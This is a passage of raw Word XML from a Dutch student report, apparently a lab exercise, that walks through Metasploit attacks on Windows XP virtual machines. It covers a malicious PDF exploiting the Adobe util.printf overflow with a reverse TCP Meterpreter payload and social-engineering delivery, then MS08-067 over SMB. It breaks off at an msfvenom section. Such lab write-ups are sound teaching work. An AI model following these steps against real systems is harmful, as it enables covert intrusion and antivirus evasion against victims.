      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B1799A">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B1799A">
        <w:t xml:space="preserve"> zou ons toelaten om via een shell verbinding te interacteren met het slachtoffer systeem. Als men hier bv: een nieuwe user zou aanmaken,</w:t>
      </w:r>
      <w:r w:rsidR="002D45DE">
        <w:t xml:space="preserve"> zal cmd.exe (in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D45DE">
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D45DE">
        <w:t>) verschijnen in de lijst van lopende processen =&gt; dit is niet onder de radar en zou kunnen opgemerkt worden.</w:t>
      </w:r>
      <w:r w:rsidR="00B1799A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7C0D" w:rsidRPr="00F80FAE" w:rsidRDefault="002D45DE" w:rsidP="00F80FAE">
      <w:r>
        <w:t xml:space="preserve">Bij de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> zullen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0005015D">
        <w:t>developers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> hun eigen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0005015D">
        <w:t>extenties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> kunnen schrijven in de vorm van “shared object “ (DLL) files die kunnen dan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0005015D">
        <w:t>geupload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0005015D">
        <w:t>geinjecteerd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> worden in lopende processen op de pc van het slachtoffer. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0005015D">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> en alle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0005015D">
        <w:t>extenties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> die geladen worden zullen uitgevoerd worden zonder gebruik te maken van het geheugen daarom zal het niet worden gedetecteerd door </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0005015D">
        <w:t>anti-virus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve"> programma</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="0005015D">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en zal het niet te zien zijn in de lijst van processen</w:t>
      </w:r>
      <w:r w:rsidR="0005015D">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kort gezegd zal het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreterproces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geupload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>heap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van het geselecteerde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> op de remote host.</w:t>
      </w:r>
      <w:r w:rsidR="0005015D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00603B12" w:rsidRDefault="00603B12" w:rsidP="00A518BB">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc440110969"/>
    </w:p>
    <w:p w:rsidR="00603B12" w:rsidRDefault="00603B12" w:rsidP="00A518BB">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRDefault="00A518BB" w:rsidP="00A518BB">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Malicious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PDF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="005319D3" w:rsidRDefault="00E6371C" w:rsidP="00E75755">
      <w:r>
        <w:t xml:space="preserve">We zijn begonnen met een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malicious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pdf te maken die we dan via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>social</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> engineering technieken op de pc proberen te krijgen. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maakt gebruik van de adobe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>util.printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00597BBE">
        <w:t xml:space="preserve">) buffer overflow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00597BBE">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00597BBE">
        <w:t xml:space="preserve"> die te vinden is in versie 8.1.2 en vroeger</w:t>
      </w:r>
      <w:r w:rsidR="00A954DE">
        <w:t xml:space="preserve"> van adobe reader</w:t>
      </w:r>
      <w:r w:rsidR="00597BBE">
        <w:t xml:space="preserve">. Deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00597BBE">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00597BBE">
        <w:t xml:space="preserve"> maakt het mogelijk voor een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00597BBE">
        <w:t>ongeauthenticeerde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00597BBE">
        <w:t xml:space="preserve"> remote aanvaller om kwaadwillige code uit te voeren.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52328" w:rsidRDefault="00A954DE" w:rsidP="00E75755">
      <w:r>
        <w:t xml:space="preserve">We starten door </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> te laden in de terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRPr="00E75755" w:rsidRDefault="00845D85" w:rsidP="00E75755">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F640240" wp14:editId="5AB71270">
            <wp:extent cx="5724525" cy="3198140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7093" cy="320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55" w:rsidRDefault="00845D85" w:rsidP="0057699B">
      <w:r>
        <w:t xml:space="preserve">Hierna kunnen we beginnen met onze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malicious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pdf aan te maken :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1DD1" w:rsidRDefault="004D1DD1" w:rsidP="004D1DD1">
      <w:r>
        <w:t xml:space="preserve">1.kies welke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> je wilt gebruiken: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/fileformat/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adobe_utilprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004D1DD1" w:rsidRDefault="004D1DD1" w:rsidP="004D1DD1">
      <w:r>
        <w:t xml:space="preserve">2.dan kies je de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (verbinding die je wilt maken)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1DD1" w:rsidRDefault="004D1DD1" w:rsidP="004D1DD1">
      <w:r>
        <w:t xml:space="preserve">3. het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listening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(van jezelf dus) moet worden ingesteld bij LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="004D1DD1" w:rsidP="004D1DD1">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00EE2CD3">
        <w:t>De poort waar de reverse-TCP connectie op gemaakt gaat worden word ingesteld bij LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1DD1" w:rsidRDefault="004D1DD1" w:rsidP="004D1DD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20DBCC15" wp14:editId="2B310B5C">
            <wp:extent cx="5760720" cy="3403600"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53439455" wp14:editId="629E6DF9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>112395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="270510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DD1" w:rsidRDefault="004D1DD1"/>
    <w:p w:rsidR="00F27542" w:rsidRDefault="00F27542">
      <w:r>
        <w:t xml:space="preserve">Nu onze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gemaakt is dienen we deze op een us</w:t>
      </w:r>
      <w:r w:rsidR="00EE2CD3">
        <w:t>b stick te zetten , daarna zetten we deze pdf op de pc van het slachtoffer</w:t>
      </w:r>
      <w:r>
        <w:t>. We hebben ook geprobeerd de pdf door te sturen via mail/facebook maar dit ging niet omdat de mailservice/facebook het bestand als virus aangaf en dus blokkeerde.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27542" w:rsidRDefault="00F27542">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C4C57">
        <w:t xml:space="preserve">Nu moeten we een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C4C57">
        <w:t>listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C4C57">
        <w:t xml:space="preserve"> starten</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> die luistert op de ingestelde poort of er een verbinding word gemaakt (dus als de pdf word geopend door het slachtoffer)</w:t>
      </w:r>
      <w:r w:rsidR="00893AED">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67528" w:rsidRDefault="00893AED">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="093A8B5C" wp14:editId="2600F89A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-11430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4970145" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525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542" w:rsidRDefault="00F27542"/>
    <w:p w:rsidR="00F27542" w:rsidRDefault="00F27542"/>
    <w:p w:rsidR="00F27542" w:rsidRDefault="00F27542"/>
    <w:p w:rsidR="00F27542" w:rsidRDefault="00F27542"/>
    <w:p w:rsidR="00F27542" w:rsidRDefault="00893AED"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22B9E468" wp14:editId="507C3F20">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13970</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>255270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4991100" cy="2302510"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRDefault="00893AED"/>
    <w:p w:rsidR="00893AED" w:rsidRPr="00D914C0" w:rsidRDefault="00893AED" w:rsidP="00D914C0">
      <w:r>
        <w:t xml:space="preserve">Uiteraard is de juiste versie van adobe nodig in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xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (versie 8.1.2 of lager) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRDefault="00893AED" w:rsidP="00D914C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BA4C9A7" wp14:editId="5664BF07">
            <wp:extent cx="2371725" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="952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ED" w:rsidRDefault="00893AED" w:rsidP="00D914C0">
      <w:r>
        <w:t xml:space="preserve">Bij deze versie zou het normaal moeten lukken , maar de verbinding word nooit volledig opgesteld ! </w:t>
      </w:r>
      <w:r w:rsidR="00D15571">
        <w:t xml:space="preserve">Normaal gezien zou er een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D15571">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D15571">
        <w:t xml:space="preserve"> sessie moeten starten … </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wij hebben dit getest met meerdere versies van adobe en met </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service pack 2 dus wij denken dat het ligt aan de updates van sp2. Ook hadden we eerst problemen met connectiviteit tussen de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VM’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maar dit hebben we kunnen oplossen door het netwerk correct in te stellen (gekoppeld aan : NAT-netwerk)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00421DF3" w:rsidRDefault="00B93F46" w:rsidP="00421DF3">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc440110970"/>
      <w:r>
        <w:t>MS08-067</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00B93F46" w:rsidRDefault="00B93F46" w:rsidP="00B93F46">
      <w:r>
        <w:t xml:space="preserve">Met </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is het mogelijk om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xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machines te hacken door enkel het IP adres van het slachtoffer te kennen. Er moet dus geen PDF of EXE geopend worden op de machine van het slachtoffer om een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sessie te starten. Om dit te </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verwezelijken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maken we gebruik van een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in een service die gebruikt wordt do</w:t>
      </w:r>
      <w:r w:rsidR="00E86C38">
        <w:t>or het samba protocol</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93F46" w:rsidRDefault="00B93F46" w:rsidP="00B93F46">
      <w:r>
        <w:t>Om te starten is het altijd goed om eens een portscan te doen op het slachtoffer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93F46" w:rsidRDefault="00B93F46" w:rsidP="00B93F46">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B656FC5" wp14:editId="534DBA74">
            <wp:extent cx="5760720" cy="20447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F46" w:rsidRPr="00B93F46" w:rsidRDefault="00B93F46" w:rsidP="00B93F46">
      <w:r>
        <w:t>De poort 445 die gebruikt wordt</w:t>
      </w:r>
      <w:r w:rsidR="006D5A66">
        <w:t xml:space="preserve"> door het samba protocol staat open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRDefault="006D5A66" w:rsidP="00D914C0">
      <w:r>
        <w:t xml:space="preserve">Nu kunnen we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> opstarten en onze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kiezen:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DC3CF8E" wp14:editId="1E6DD0B6">
            <wp:extent cx="3876675" cy="333375"/>
            <wp:effectExtent l="0" t="0" r="9525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66" w:rsidRDefault="006D5A66" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00D914C0" w:rsidRPr="006D5A66" w:rsidRDefault="006D5A66" w:rsidP="00D914C0">
      <w:r w:rsidRPr="006D5A66">
        <w:t xml:space="preserve">Het “show options” commando is zeer handig om </w:t>
      </w:r>
      <w:r>
        <w:t>na te kunnen kijken welke opties we nog moeten instellen. Zoals je ziet moeten we het target adres nog meegeven.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="006D5A66" w:rsidRDefault="006D5A66" w:rsidP="00D914C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C91F6A" wp14:editId="50B0E24B">
            <wp:extent cx="5760720" cy="2814320"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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C0" w:rsidRPr="006D5A66" w:rsidRDefault="00D914C0" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00B3085B" w:rsidRDefault="006D5A66" w:rsidP="00D914C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C6B84A5" wp14:editId="4F449DC5">
            <wp:extent cx="4600575" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="9525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66" w:rsidRDefault="006D5A66" w:rsidP="00D914C0">
      <w:r>
        <w:t xml:space="preserve">Nu moeten we onze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> selecteren, dit is eigenlijk het deel dat we gaan uitvoeren wanneer de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gelukt is, we kiezen hier voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5A66" w:rsidRDefault="00CE3D81" w:rsidP="00D914C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60876FA8" wp14:editId="399E38EA">
            <wp:extent cx="5760720" cy="495935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71" w:rsidRDefault="00D15571" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00D15571" w:rsidRDefault="00D15571" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00CE3D81" w:rsidRDefault="00CE3D81" w:rsidP="00D914C0">
      <w:r>
        <w:t>Als we nu het commando “show options” nog eens uitvoeren kunnen we zien dat er enkele opties bijgekomen zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3D81" w:rsidRDefault="00CE3D81" w:rsidP="00D914C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F5C2AE4" wp14:editId="73597594">
            <wp:extent cx="5760720" cy="293624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38" w:rsidRDefault="00E86C38" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00CE3D81" w:rsidRDefault="00CE3D81" w:rsidP="00D914C0">
      <w:r>
        <w:t xml:space="preserve">Zoals je kan zien moeten we hier nog het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adres ingeven op welke we gaan luisteren.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3D81" w:rsidRDefault="00CE3D81" w:rsidP="00D914C0">
      <w:r>
        <w:t xml:space="preserve">Als we het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adres hebben ingegeven kunnen we onze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> starten en zal er een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sessie geopend worden. We hebben nu controle over het toestel zonder dat het</w:t>
      </w:r>
      <w:r w:rsidR="002F7F2D">
        <w:t xml:space="preserve"> slachtoffer het door</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> heeft.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7FE212" wp14:editId="2E0225D4">
            <wp:extent cx="5760720" cy="202438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15" w:rsidRDefault="00CE7015" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="00D914C0"/>
    <w:p w:rsidR="00CE7015" w:rsidRDefault="00CE7015" w:rsidP="00D914C0"/>
    <w:p w:rsidR="004C7F52" w:rsidRDefault="004C7F52" w:rsidP="004C7F52">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc440110971"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malicious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004C7F52" w:rsidRDefault="004C7F52" w:rsidP="004C7F52">
      <w:r>
        <w:t xml:space="preserve">Hierbij maken we een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aan met behulp van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE44D0">
        <w:t xml:space="preserve"> (tool die </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE44D0">
        <w:t>payloads</w:t>
      </w:r>
